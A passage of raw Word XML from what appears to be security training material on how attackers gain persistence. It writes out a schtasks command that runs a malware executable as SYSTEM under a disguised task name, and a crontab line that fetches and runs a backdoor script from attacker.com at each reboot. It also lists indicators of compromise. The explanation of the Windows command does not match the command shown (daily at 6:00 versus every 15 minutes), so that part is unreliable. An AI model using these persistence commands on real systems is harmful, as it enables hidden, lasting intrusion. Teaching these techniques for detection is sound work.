      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatically run their malicious scripts or malware</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> at scheduled times without the user knowing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7F27F" w14:textId="2439FD21" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>This helps them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157ECE4D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Stay </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inside the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD237C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Re-run malware even after a reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0718C6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Remain </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>undetected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E3DC6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Trigger attacks at specific times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D87D8D" w14:textId="49CF2E4B" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Windows uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scheduled Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">, while Linux uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cron Jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63555872" w14:textId="4BF4BF8E" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Procedure 3.1 – Windows: Create Scheduled Task to Run Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EFF87" w14:textId="5C11E138" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120DD063" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Make malware execute silently every day at a specific time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700207C" w14:textId="74BE9066" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F77FA" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Once inside, the attacker runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A7674" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>schtasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> /create /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>tn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>SystemUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>" /tr "C:\malicious.exe" /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> minute /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>mo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> 15 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F28AA" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>This creates a repeating task “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>SystemUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>” that launches their malware every 15 minutes, as SYSTEM (full admin rights).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F549FA2" w14:textId="704D944A" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7D0FE5" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>tn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>: Task name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7C2C0" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>tr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>: File to run (in this case, the malware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456EB49" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> daily /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>st</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> 06:00: Runs daily at 6:00 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D1774" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> SYSTEM: Runs with system-level privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C97F01" w14:textId="1C1F0A8E" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A163E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Malware runs every morning silently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD409F0" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Attacker maintains control even after reboot or logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A588A" w14:textId="6BFBCE21" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure 3.2 – Linux: Add a Cron Job for Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA36D50" w14:textId="78DD592C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A58555" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Execute malware or commands every time the system boots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8DD9A" w14:textId="11113E76" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B36D3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>echo "@reboot /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>/bin/curl http://attacker.com/backdoor.sh | bash" &gt;&gt; /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3081B" w14:textId="5C04DDDF" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768ACA46" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>@reboot: Run this command every time the system restarts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457ED0CC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Uses curl to download the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1CF535" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>The script runs immediately via bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7B697" w14:textId="144807C6" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C248B82" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Backdoor reopens every time the system reboots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4108CD19" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Attacker keeps access without having to reinfect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B10DE1" w14:textId="2A5EF51F" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="39B254C6" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRDefault="003F7A07" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686E2363" w14:textId="1B2D7370" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why Attackers Use This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10"/>
        <w:gridCol w:w="5290"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="35AC7672" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64508513" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="000E0A44" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="38BB2862" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3448BF8B" w14:textId="5CF9D35E" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Long-Term Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E90D96" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Script keeps running even if user logs out</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="33EAFF9C" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F08F8DC" w14:textId="562BC27D" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Stealth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16401825" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="001D5AD4">
            <w:pPr>
              <w:ind w:left="207" w:hanging="207"/>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Runs in the background without alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="70F0FDB5" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="595CD80A" w14:textId="5B904CEB" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Privileged Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D8E5B4" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scheduled tasks often run as admin or root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="77E506FB" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6842085B" w14:textId="3239BCC1" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>e Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="484771C9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Avoids antivirus by executing under trusted processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A293290" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Indicators of Compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39856D4B" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Unknown scheduled tasks/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> jobs appearing in system configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEABD0" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Scripts or binaries in strange locations (especially hidden folders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D2350A" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Malware that respawns soon after being deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32497861" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Motivation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C0079" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>To maintain guaranteed, “invisible” access so their theft, spying, or attacks continue—even if noticed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CAF6A0" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Impact (If Not Caught):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73643BB4" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
